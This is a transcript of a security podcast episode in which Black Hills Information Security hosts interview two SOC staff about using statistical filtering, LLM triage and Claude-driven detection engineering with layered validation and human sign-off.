AI in the SOC: Interview with Hayden Covington and Ethan Robish from the BHIS SOC | Episode 40
E40

AI in the SOC: Interview with Hayden Covington and Ethan Robish from the BHIS SOC | Episode 40

Bronwen Aker:

Hello, everyone, and welcome to the AI Security Ops Podcast. Today, we have a very special episode. We have several additional people, well, two additional people coming in to help us learn all about how SOC, security operation centers, can take advantage of artificial intelligence, large language models, math, and data, and all of that good stuff, and basically help defend help not only defend, but also track what is happening more effectively, more efficiently, not only to reduce the workload on our very important, very brilliant people, but also to better take care of our clients. So with us today, we have Ethan Robich Hello. And Hayden Covington.

Bronwen Aker:

In addition to our usual cast of characters, doctor Brian Furman.

Brian Fehrman:

Hey. Hey.

Bronwen Aker:

Derek, are you also a doctor? Doctor Derek Banks?

Derek Banks:

Not. Ah. I did stay at a Holiday Inn Express last night.

Bronwen Aker:

Alright. Doctor well, primary doctor Derek Banks, and I am, of course, Bronwyn Aker. This podcast is brought to you by Black Hills Information Security, where we are pen testing experts, extraordinaire, and also anti siphon training, the home of the what are we calling it now? Pave forward what you can? Anyway, we specialize in real world focused cybersecurity training that is also affordable for people who maybe don't have massive budgets, making it easier for real people to achieve real skills so that they can operate in the real world of cybersecurity.

Bronwen Aker:

Take it away, gentlemen.

Derek Banks:

So one thing I wanted to point out is and we we can talk about socks in general. What whatever kind of socks you like, Argyle socks, plaid socks, whatever. But also probably not widely known still or maybe maybe it's getting more widely known is that we actually run a SOC at Black Hills as part of our services. So we're not just pen tests and training. We also have a SOC and and actually, are other tribes of companies too.

Derek Banks:

But but anyway, you two work in our BHIS SOC. Right? Yeah.

Ethan Robish:

That is correct.

Hayden Covington:

SOC was kinda under the radar there for for a little bit. It was mostly, you know, word-of-mouth, like, going between different people that we've worked with, you know, within Black Hills just kind of in in general. And then we had about a year of last year where we just kinda rebuilt everything from the ground up in a way that was more scalable. And so now we're we're trying to get the word out a little more that, you know, we have an MDR offering that is hopefully, you know, pretty comparable and hopefully in a lot of places beats everybody else out there. That's the that's the Black Hills thing.

Hayden Covington:

Right? Is to be the best at whatever it is that we're doing. So the SOC has that same goal.

Derek Banks:

Yeah. I mean, that a lot of things Black Hills does a lot of things differently than other companies, and that is no you know, the SOC is one of those things where we tried to bootstrap it. We didn't take venture capital. We did it from, basically, let's just start a SOC and went down many different rows until we landed on the restructure, which is then probably led to kinda how we can, you know, use AI. Right?

Derek Banks:

And so I I don't really have a script or any questions for you all. I'm sure they'll come up. But why don't we just start with kinda how the architecture is and and what we do for folks, and then how AI helps us with that?

Hayden Covington:

Okay. Yeah. I I kinda have an idea of what Ethan will probably mention. So I'll I'll stray away from the thing he spent a lot of time on. But just generally, our SOC is all now, like, infrastructure first.

Hayden Covington:

So it's all infrastructure as code. Everything's API based. And if you're familiar with AI, you can kinda understand how advantageous that is to us because, you know, with a a modern agent or MCPs or even just, you know, a pretty decent agent that's, you know, command line based, you can really reach into pretty much anything. And so that was a pretty big driving factor in the the restructuring is we need to be able to reach into and manage infrastructure. We need to triage and investigate alerts, that tier one triage, you know, alert that, is gonna become, you know, thousands of them.

Hayden Covington:

They're gonna stack. If we can reach in and analyze those with, you know, a trained model or prompts that we've tested thoroughly, that'll allow us to still alert on things that are noisy, but kind of offset some of that with some some automated help. So yeah, that was the the whole restructuring that kind of brought us to, you know, the platforms that we use now including, you know, a a sore platform and email security and things to canaries and the the whole deal. So it was a a year long experience.

Derek Banks:

Yeah. The world of AI, you're only an API key away from the data. Right? So

Ethan Robish:

Yeah. Yeah.

Derek Banks:

Yeah. You know, I think that we're just, you know, to kinda to you know, from somebody who was involved in the SOC and now, like, overdoing different things after the restructure, like, we went away from kinda, like, the SIM model where you go into a web interface and do a search and and where analysts are actively, like, doing those things to where we're now we have more of a logic and automation type approach before it bubbles up to an analyst. Is that kind of like the 30,000 foot view of how how that worked? That that's a

Hayden Covington:

good way to put it. Yeah. Like, the the automation pipelines of the SOAR really allow us to do a lot of things. That's where Ethan spent a a lot of his his effort is building some SOAR magic. But then we can also build on top of the platforms our own, like, portal.

Hayden Covington:

So we have a customer portal that pulls together all of the different parts of our service for customers and provides them management abilities across their endpoints that allows them to search, you know, deployed packages and versions across other endpoints if there's a vulnerability. Like, since all of it's API based, we can offer them pretty much anything in this portal.

Ethan Robish:

So this being the AI podcast Yep. We should talk about how we how how we're using AI, how we're integrating AI. So one thing that we did not do, Derek, you mentioned this jokingly, but we did not just set up OpenClaw or Clawdbot or whatever, and say run run the SOC Right? Like

Derek Banks:

Wait. You didn't? No.

Ethan Robish:

You can tie tie

Brian Fehrman:

it into Moltbook and crowdsource Yeah. Yeah. Instance. Yeah.

Derek Banks:

Yeah. So can go wrong.

Ethan Robish:

I I think what we found most effective is instead of trying to I mean, we say OpenCloud jokingly, but like the equivalent would be, you know, just setting up something, connecting it to everything, and have it have the AI try to do everything. And I I don't think we would be very effective if we tried to do that. So what we're doing is kind of laser focusing, you know, AI is really good at doing this aspect. And then we plug in over here and, like, tailor it for this aspect. So it's everything from, like Hayden mentioned the the portal, like, kind of the dashboard that customers can go in and see.

Ethan Robish:

AI was heavily used to to code that that portal. Right? And, obviously, being a pen test company, we had it pen tested by, you know, credentialed people, but it's not just like pure vibes.

Derek Banks:

Pure vibes. Yeah. Well, a lot of things are pure vibes these days. So when you were saying that, it kinda reminded me of a a couple of things. But one in particular, if you'll remember the inverse triangle that I made where you have all this data.

Derek Banks:

Right? And it gets filtered through rules and you basically, you know, you get like 90% of your stuff you've seen a million times and you know it's fine. Right? And then you get this 10% that you might write some code for to whittle it down any further to where you get to this chunk of data that is like maybe point 5% of the volume of data you have and that's what you have the AI go look at. Is that kind of what kinda what you're saying?

Derek Banks:

Is the targeted analysis of specific portions of data? You can go into specifics. It'll be okay. Yeah.

Ethan Robish:

So so I I was talking about like just different aspects that we're plugging in AI. So in the SOAR, for sure. It it's funny. We talk about AI and everyone thinks, I must mean LLMs and, you know, chatbots and

Derek Banks:

stuff I'm like I'm aware of that battle.

Ethan Robish:

Right. Yeah. You guys know better than any.

Derek Banks:

But so so in the store

Derek Banks:

Most business, like, you know, LLMs is like 5% of what you can do with like AI, and the other 95% is, you know, other things.

Ethan Robish:

Yeah. So we're we're actually so that inverse triangle you're talking about, inverse pyramid, to to filter down. I mean, if we if we started with all of our alerts, the open the flood gates and gave it to an LLM, we'd be in for a bad time. Like, it it just we'd be paying way too much money and not getting great results And so

Derek Banks:

say, sounds like a lot of API usage.

Hayden Covington:

We're at, like, tens of thousands or hundreds of thousands of alerts a day Right. Like,

Derek Banks:

kind of volume.

Hayden Covington:

Yeah. We can't also just send those to people.

Ethan Robish:

How do we filter those down? So, ironically, it's using more the traditional AI, I guess. Like, the the boring AI. It's, like, k means clustering and, like, basic statistics and rolling windows that just base baseline baseline organizations and compare against the baseline and aggregate things together. And then once something becomes a signal that kinda goes above the baseline noise floor, That's what gets escalated to both, you know, AI triaging and our analysts looking at.

Derek Banks:

Yeah. I've been referring to those types of techniques. LLMs triaging,

Ethan Robish:

I should say.

Derek Banks:

Yeah. I've been referring to those types of techniques as just machine learning or statistical learning. Right? The traditional kind of, you know, stuff that doesn't take a huge data center to run. Maybe like like, you know, NLP or classification or something like that, but you're saying clustering.

Derek Banks:

Yeah. So basically, you're you're using math to take a large volume of data to make it a smaller volume of data that then you can do further analysis on. That's kinda kinda and I'll and I'll get the editors or the the video editors a picture of my triangle. But that it's kinda kinda what I was expecting is that you would have a you have a big data problem. Right?

Derek Banks:

There's an internet scale data problem, and so how do you make that a smaller amount of data? And the answer is math.

Hayden Covington:

Yeah. And we are using the standardized LLMs too. So I think my my favorite use case that I've seen from us is around like detection engineering. Like we as as a team, you know, over the year would write something like, you know, our SOC director says something like 50 detections a year. Right?

Hayden Covington:

Which is a pretty decent number. We're doing roughly one a week. And if as you're buried in SOC alerts and restructuring, like, that's okay. It needs to be higher. So that was one of the first.

Derek Banks:

You're talking about like previously in our SOC.

Hayden Covington:

Previously, yes.

Ethan Robish:

50 out of here. Yeah.

Hayden Covington:

Roughly 50 a year. We'd have bursts where we did more. We'd bring in open source ones. 50 custom.

Derek Banks:

And there's some kind of breach where you're

Ethan Robish:

like, oh god. Right.

Derek Banks:

We need an alert.

Hayden Covington:

Exactly. And so that was one of the first areas we kind of targeted as can we get some benefit out of this? And I won't go through all the details of things we did or didn't try, but I'll tell you like right now, you know, we had the notebook plus plus stuff dropped recently about how that that infrastructure was compromised and there's potential ramifications around that. So what we were able to do is take that report and then drop it into, you know, we're a Claude shop. So we dropped it into Claude, which has a skill that researches, for detection engineering.

Hayden Covington:

So it has a very predescribed way that it gets specific data. It looks for preexisting open source detections around these things. It it structures all this in a certain way, and we can then take that structure and provide it to Claude inside of our our Git repos for our detection engineering, which then has very specific and very expansive prompt instructions on how to write, our threat detections, which, you know, includes, you know, everything from, you know, another location in that repo that contains mock events. And then it has instructions on, you know, step by step what it needs to do to validate before it even makes a a push. And then it, you know, pushes through GitHub actions, which then runs it through our rule pipeline and validators and, like, test deployments against the actual, you know, infrastructure that would be on.

Hayden Covington:

And then by the time it gets to, you know, in this situation, let's say me, by the time it gets in front of me, it's been tested, validated. There's test events that show that, you know, if this log right here fired, this rule would trigger. And so all I then need to do is it's like I've been handed an alert from, or a new detection opportunity from, like, a tier one analyst, and I just need to go through and spot check, make sure they did things right, make sure they didn't miss any glaring issues. And then I can also see all of their very detailed work that they've explained all the things they did and why they made those decisions. And so I can, you know, write a rule and it can be done in two minutes versus me having to go and do all these manual steps that that AI is really, really good at doing predictably as long as you tell it how to do it.

Derek Banks:

Well, the predictability comes from the scaffolding code that's around it. Right? Exactly. Is it all is all of that that you described essentially in a custom skill that someone in our SOC wrote? Is it, like, basically a custom skill scaffolding or is that more like a multipart kind of thing?

Hayden Covington:

It's it's multifaceted. I mean, the research thing is a skill. The actual execution of the detection engineering is very specific like Claude MD file. And so

Derek Banks:

Oh, okay.

Hayden Covington:

On on GitHub, it was classified as a sub agent of

Ethan Robish:

Well, right.

Hayden Covington:

Specialized agent of So

Ethan Robish:

we still have we still have a sub agent or like agents in Claude. We have Yeah. Skills. We have Claude MD files, and we have scripts to supplement that because Yeah. Like you said, Derek, like, the deterministic stuff, like, still need to codify and put guardrails around.

Ethan Robish:

Yeah. But as as an example, so I just did a detection yesterday and deployed it last night. I look at it today and I was like, this so this is something that can go wrong, but also it's I'll say why it's actually kinda cool. The the detection engineer so I had Claude write the detection. You know, I I guided it with like, hey, this is what I wanted to do, and then we've got other agents that like review the detection.

Ethan Robish:

So it had gone through and so it I I had actually made it write two detections, one for each different type of data source, and it's kinda mixed them. So like in one of them, it was using fields that only exist in the other data source. Iron I didn't catch it. I probably should have paid closer attention in the review. Claude didn't catch it.

Ethan Robish:

All of our validators didn't catch it. So that's not great, but luckily, we have a process where, like, it's an experimental rule at first. It's not like end of the world that it's doing this. But now I can go through and be like, hey, why did we miss this? Like, we got all these layers.

Ethan Robish:

We we can fix this. Like, we can prevent this from happening again. And I don't know. I think that's pretty cool. Like, it's it's like learn having your teammate learn, but it's it's like codified.

Ethan Robish:

It's like, here here's the process, you know, the the process that you might write in, like, a SOP, but but people actually like, the agents actually adhere to it. Like, they're they're reading it every single time versus humans. You know? You read the SOP a couple times and you're like, yeah, I don't need to look at it again. Remember it.

Ethan Robish:

And then they forget things and

Derek Banks:

Yeah. I I've noticed that more on, you know, two spectrums of people right now in information security. The curmudgeons that think AI is still a fad and they're never gonna use it. And the folks who think AI like fixes everything and does everything, like, perfectly, and none of those are true. Right?

Derek Banks:

But I it's surprising when when AI is wrong, people like to point it out and like, well, but people are wrong too. Right? Like, that mistake could have been made by a person. And I remember one time a pen test report. I had a I went through a pen test report.

Derek Banks:

I went through tech review and and and writing review and everything, and it still had a customer name that wasn't the customer in there. Right? Like, everybody missed it somehow. And so people make mistakes too. And so that's why you have ways to check those things and then double check those things.

Brian Fehrman:

Yeah. And I think that the the the entire approach that you described is is wonderful because it touches on and solves so many different issues. I I mean, the two big things that I see there are breaking things down into very discrete tasks rather than one monolithic approach. And then also having that explainability aspect that you can go back and you can look look at, you know, through each step of the process of what it did, why it did it, and being able to really troubleshoot it. Because otherwise, like the the way that I look at it is if you just try to do everything just like one huge monolithic go and just hope for the best.

Brian Fehrman:

It's like being like like skipping an entire game to the final boss battle and hoping for the best. And it's like, you don't know the controls, you don't know like the mechanics, you don't know how anything works, you're just gonna be like, I just hope it goes well. And then what do you do if it doesn't. Right? Now you gotta go back, you gotta restart, like you gotta relearn all of that from scratch and, you know, it might not end up saving any time.

Brian Fehrman:

And so the the approaches and the guardrails and everything that you guys described that you have in place, think is the perfect approach to it.

Hayden Covington:

Because Ethan mentioned a part of that like very briefly about like, it's then code reviewed. Like when we did this all through GitHub Copilot, it's not like just limited to Claude. But it would be very fascinating to watch as we would kick off the actual assignment of this GitHub issue to the end the agent that would then write the detection. It would then, you know, push this out at which would trigger, you know, the settings we had on our repo that things are automatically code reviewed by GitHub Copilot. So it would push this out and then Copilot using a different set of instructions would then review its own work in a sense.

Hayden Covington:

And it they would we could then tag it back and say, hey, you missed this. Can you go fix this? And it would be like a back and forth with, you know, two personalities of one agent, which was kind of funny to watch sometimes. And other times, it wasn't as funny when we had like a 100 comments on a git issue, which that got to be a little much. That one was probably my fault because I merged or tried to merge, think, like 30 AWS rules.

Hayden Covington:

And it wrote them in, twenty minutes and it eventually did a pretty dang good job. But it was a very big a very big PR to review.

Derek Banks:

I've actually noticed that with chat GBT, like, five recently that, like, it it the big model tends to be a little bit more detailed and verbose than I want it to be. Yeah.

Bronwen Aker:

Verbosity has been a problem with LLMs, I know, forever. So you guys have touched on a couple of things that as a former software developer, I'm delighted to hear, because the the the monolith, the huge, massive Uber prompt, to me, that's too much like a black box. And what I'm hearing is that the way you are implementing agents and and, you know, other agents all over these places, checks and balances, The granularity, that gives so much more control to us as humans, as supervisors of these silicon entities that are that are acting on our behalf. It's it's very reassuring to hear because I'm also one of the the big words that I know gets thrown around frivolously is accountability. And if you can't track down exactly where something broke, we're gonna be held accountable for what they do anyway.

Bronwen Aker:

And now it sounds like you've got that ability to really figure out what's going on, and the reproducibility. Oh my god. It's kinda like when I first discovered automated testing. I was so delighted. It was that was a that was a happy day.

Bronwen Aker:

Well,

Derek Banks:

that's the thing that I have really enjoyed with how I've been using Clog code the most recently is having it do testing and debugging, like, interactively with me. Like and I I really enjoyed it. It was building a Docker container for me, and it just put itself in a loop and just would check back every minute to see if the job was done. I didn't ask it to do that, and I was like, that's why thank you. I'm going to go have a sandwich.

Derek Banks:

So Well,

Hayden Covington:

one of my real quick, bro. When you mentioned accountability, I love that because when we mention AI in the security space, sometimes people get scared. They're like, okay. So you just let Anthropic do whatever. Great.

Hayden Covington:

Love that. But we're sort of what we've tried to push in the SOC is very much like if you ask an agent to do some work, you are effectively signing off on this work as your own, and you are going to be held accountable if it is in any way incorrect. And so, you know, you you have to it's it's any like anything else, it's a tool. And so you use this agent as a tool to complete some work. If I were to perform a test and use it, you know, what name a tool and I do it wrong in some way, that's my fault.

Hayden Covington:

So if I'm using an LLM or an agent or whatever for this work and I push this work and it breaks something, that's on me.

Derek Banks:

So, you know, the what I'm saying in my training class, like, upfront is, like, you should look at the current capabilities of of AI as a super powerful intern Yes. That is really talented, but also still needs a lot of supervision. Yeah. Definitely.

Bronwen Aker:

I I usually say it's a drunk intern. Yeah.

Derek Banks:

That was, like, 2024, but, like, 2024. Setting. Like, it was getting better, and now it's, like, hungover the next day. Right? Like

Bronwen Aker:

Yeah. Well, it's, you know, it's it's has good hits, moments of brilliance, and then it has some really creative bad misses.

Derek Banks:

I will say that I I don't know. And y'all probably heard this. I don't know what what kind of other, like, AI podcasts and stuff y'all listen to or if even if at all. But listened to a couple different ones, and the general consensus seems to be in the AI community is that somewhere in November or December, we kinda turned a corner, and things are different now, specifically with Claude code and the latest Opus model, which I I hear they have another one potentially coming out real soon, which is

Hayden Covington:

Yeah.

Derek Banks:

Okay. Yes. Right?

Hayden Covington:

Excited for that.

Derek Banks:

Yeah. And and so but I I, you know, I kinda feel like too, yeah, the model's great. But using OpenCode with chat GPT five one, I I really think it's the iterative agent that is kind of the groundbreaking thing. And and so but I I I feel like the 2026 is gonna be the year of everybody figuring out that these iterative agent type technologies are really powerful. And again, it's the scaffolding code, not necessarily the model.

Bronwen Aker:

So I know that we have a time constraint for Ethan. Do we wanna give him the floor so that he can talk about some of the coolness he's been working on?

Derek Banks:

Absolutely.

Ethan Robish:

Mean, I I I think I just did, but I I will I will take so one thing that I've have kinda realized, like, in the last few months, you know, getting getting more into AI is, like, you know, from from the outside, like, getting started, it seems kind of, like, intimidating. You hear people having all these success stories of, you know, yeah, it's just magic. It's doing the thing. And then you go try it and it's like, you know, you you're basically trying to one shot everything at that point, like when you first start. And I'm I'm reading a book that's that's actually pretty good.

Ethan Robish:

It talks about the impressive demos of like, hey, can one shot an application. Those the ones that it, like, knocks out of the park are ones that are all over its training dataset. Like, everyone everyone has written a to do list application in every single language. Like, it can one shot it because it's seen the whole project already. It's not figuring it out on the fly.

Ethan Robish:

If you have to try to one shot, you know, something more complex, something unique to your situation, it's probably gonna fail. And I think the key is to get, like, incrementally. You don't just go from, like, you know, I try to one shot everything to having all these guardrails in place and having, you know, it plugged in and umpteen different ways and doing individual tasks, like, start incrementally. And once you get to a point where you've got the scaffolding set up where you can tell it, like, okay, I've I've here's my unit test. Here's my, you know, hooks that, you know, check things every single time that the code runs.

Ethan Robish:

Like, every time you find a mistake, you can tell the AI say, hey. Here's the mistake or here's what happened that I don't want it to to happen. Like, look at our scaffolding, like, figure out how to fix fix that so it doesn't happen again, or you can give it ideas to improve. It can start improving itself, obviously, with your guidance, but that's where it it starts to snowball. You you roll down the hill and your snowball gets bigger, and all of a sudden, like, you look back up and you're like, oh, wow.

Ethan Robish:

That

Derek Banks:

It became an avalanche.

Hayden Covington:

Yeah. And no one's gonna share like the failure stories or those failure stories aren't gonna get as much traction either. Like it's much better to share like a tweet about how like AI one shot at whatever this app is that this person just put together and here it is on GitHub. Also, here's my, you know, all my donation links and everything like, they're only gonna share the things that make them look good.

Derek Banks:

Ethan, what's the name of that book?

Ethan Robish:

It's vibe coding which Okay. So first my first thought and probably other people's thought, a hardcover book like on AI, something that changes like fundamentally week to week, that seems ridiculous. Like, why waste my time?

Derek Banks:

Oh, is this the Gene Kim one?

Ethan Robish:

The the thing that got me was it's written by Gene Kim, which is author of The Phoenix Project. Yeah. And Oh, Steve Yeghi, which I I hadn't heard of him, but like just reading his blogs and stuff, like he's got some he's kinda like on the forefront of AI.

Derek Banks:

I'm gonna have to get

Ethan Robish:

a real LL usage, I should say.

Derek Banks:

On on my flight out to Denver on Sunday and start reading

Ethan Robish:

finished the book, but so far like I I've gotten a bunch of good things from it. It seems like, you know, broadly applicable. I mean, maybe in five years it looks very different, but like, I I'm I'm learning some good things from it.

Derek Banks:

Cool. One thing before we close out, I wanna say, in in addition to what you just said, that that's how I started developing skills is I went and got Daniel Maesler's p a personal AI infrastructure and looked at what he did and then told Claude, I want a skill to do this. Help like, I'd said, make a plan for it. We went through the plan and then basically started building the skill that I wanted and I ended up with a skill that does binary analysis for security flaws. And it actually seems to work.

Derek Banks:

I just need more binaries to test. I'm in the testing phase right now before I say that this is good. Right? So

Hayden Covington:

AI is remarkably good at helping you build more functionalities on top of it. Like, skills, better prompts. Like, you can you can do a lot of things by just using the AI to do those things. Like, as we've deployed it across the SOC to our team, people run into issues and, you know, it it maybe sounds a little bit rude, but one of the first questions I ask is, well, did you ask Claude how to fix this issue? Like, I'm sure it knows it's so pretty well.

Hayden Covington:

Right. Yeah. Like, did you ask Claude how to do this thing?

Derek Banks:

Oh, man. Well, hey. I really appreciate y'all coming on to the podcast and talking to us about what's going on in the SOC. If you wanna come again at a later date, you're more than welcome to. We're kinda informal around here.

Derek Banks:

And as with all things content related at Black Hills Information Security, it's more of a let's keep putting it out kind of thing than let's wait until we've done something really cool. So if there are things you didn't talk about, you wanna come back, you know, after Denver, like in February at some point, just, yeah, let us know. Sweet. Thanks.

Hayden Covington:

Yeah. Thanks for having us.

Brian Fehrman:

Thanks, guys. This has been great.

Episode Video

Creators and Guests

Brian Fehrman
Host
Brian Fehrman
Brian Fehrman is a long-time BHIS Security Researcher and Consultant with extensive academic credentials and industry certifications who specializes in AI, hardware hacking, and red teaming, and outside of work is an avid Brazilian Jiu-Jitsu practitioner, big-game hunter, and home-improvement enthusiast.
Bronwen Aker
Host
Bronwen Aker
Bronwen Aker is a BHIS Technical Editor who joined full-time in 2022 after years of contract work, bringing decades of web development and technical training experience to her roles in editing pentest reports, enhancing QA/QC processes, and improving public websites, and who enjoys sci-fi/fantasy, Animal Crossing, and dogs outside of work.
Derek Banks
Host
Derek Banks
Derek is a BHIS Security Consultant, Penetration Tester, and Red Teamer with advanced degrees, industry certifications, and broad experience across forensics, incident response, monitoring, and offensive security, who enjoys learning from colleagues, helping clients improve their security, and spending his free time with family, fitness, and playing bass guitar.
Ethan Robish
Guest
Ethan Robish
Ethan Robish has worked with Black Hills Information Security (BHIS) since 2008 — first as an intern and then as a full-time Security Consultant starting in 2012. In his current role as a Threat Hunter, Ethan is involved with customer engagement, research, working with Active Countermeasures’ AC-Hunter, as well as improving BHIS HTOC and SOC offerings. Previously, he implemented defensive security solutions for the Exchange Online security team as a Microsoft intern. While in college, he competed in the International Collegiate Programming Competition (ICPC) World Finals. In his time off, he enjoys cooking, playing the piano, and reading fantasy novels.
Hayden Covington
Guest
Hayden Covington
Hayden Covington joined Black Hills Information Security (BHIS) in the Summer of 2022 as a SOC Analyst. He chose BHIS after hearing many great things over the years and seeing the quality of work, as well as finding people who have the same passion for the field as he does. His favorite part of the job so far has been the community. Previously, Hayden worked in a SOC for a Naval contractor, where he also served as their SOAR project manager and SME, as well as insider threat lead. When he’s not working, Hayden can be found doing anything athletic (like triathlons!), as well as enjoying video gaming and Formula 1.